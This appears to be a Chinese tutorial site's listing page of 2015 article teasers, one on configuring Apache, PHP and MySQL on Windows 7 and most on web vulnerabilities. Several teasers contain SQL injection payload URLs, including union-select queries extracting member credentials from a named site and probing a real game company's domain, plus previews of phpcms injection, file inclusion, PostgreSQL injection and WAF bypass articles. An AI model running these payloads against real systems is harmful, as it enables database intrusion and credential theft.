-
win7下手动配置apache+php+mysql记 - Windows操作系统
win7下手动配置apache+php+mysql记本来想学学php,于是就想搭建web服务器和sql环境,结果浪费掉了不少时间。大致的总结下,也算是长个记性。 www.2cto.com 使用的安装包分别是httpd-2.2.22-win32...
栏目:windows 点击:39 日期:2015-04-17 -
JBI CMS sql注射漏洞及修复 - 网站安全 - 自学php
JBI CMS 程序过滤不严导致sql注入攻击。Exploit :http://www.chinasg.tk/news_details.php?id=-1+union+select+1,2,3,group_concat(name,0x3a,password),5,6,7+from+tbl_membersLogin page for members : /member.phpLogin page...
栏目:网站安全 点击:29 日期:2015-04-17 -
E-php 内容管理系统sql注射及修复 - 网站安全 - 自
漏洞类型:sql注入漏洞描述:E-php Content Management System (CMS),article.php页面存在sql注射。漏洞测试:http://target/path/cms/article.php?es_id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12http://target/pat...
栏目:网站安全 点击:23 日期:2015-04-17 -
Hacking Postgresql for fun! - 网站安全 - 自学php
来源:pentestmonkey.netSome useful syntax reminders for sql Injection into Postgresql databases...This post is part of a series of sql Injection Cheat Sheets. In this series, Ive endevoured to tabulate the...
栏目:网站安全 点击:50 日期:2015-04-17 -
详解如何用postgresql注入 - 网站安全 - 自学php
Postgresql是一个强大开源的关系数据库系统.它经过了15年多的开发历程,一个经得起考验的体系结构,在可靠性、数据完整性和正确性方面赢得了极好的声誉.它运行在所有主要的操作系统上...
栏目:网站安全 点击:50 日期:2015-04-17 -
phpcms 2008 space.api.php sql注入漏洞及修复 - 网站安全
影响版本:phpcms 2008漏洞描述:phpcms 是国内领先的网站内容管理系统,同时也是一个开源的php开发框架。在文件api/space.api.php中:$arr_content = $content-listinfo("userid=$userid", $order, 1, 10); //第7行...
栏目:网站安全 点击:47 日期:2015-04-17 -
phpcms 2008 query.php sql注入漏洞及修复方案 - 网站安
影响版本:phpcms 2008漏洞描述:在文件ask/query.php中:case edit_answer: //第39行if($dosubmit){if(strlen($answertext) 10000) showmessage(回答字数不能超过10000个字符);...
栏目:网站安全 点击:46 日期:2015-04-17 -
phpcms2008本地文件包括及利用(执行任意sql脚本)
文件wap/index.php?phpinclude ../include/common.inc.php;include ./include/global.func.php;$lang = include ./include/lang.inc.php;if(preg_match(/(mozilla|m3gate|winwap|openwave)/i, $_SERVER[HTTP_USER_AGENT]))...
栏目:网站安全 点击:41 日期:2015-04-17 -
征途sql注入及修复 - 网站安全 - 自学php
http://zt.ztgame.com/communion/showpic.php?consortiaid=2%20and%203=8%20union%20select%201,2,3,4,5,6,7,user(),9,10,11,12,13,14,15%20--%20And%208=11修复方案:过滤...
栏目:网站安全 点击:45 日期:2015-04-17 -
Beyond sqli: Obfuscate and Bypass - 网站安全 - 自学php
绕过WAF过滤的方法,防注入新挑战Beyond sqli: Obfuscate and Bypass|=--------------------------------------------------------------------=||=--------------=[ Beyond sqli: Obfuscate and Bypas......
栏目:网站安全 点击:47 日期:2015-04-17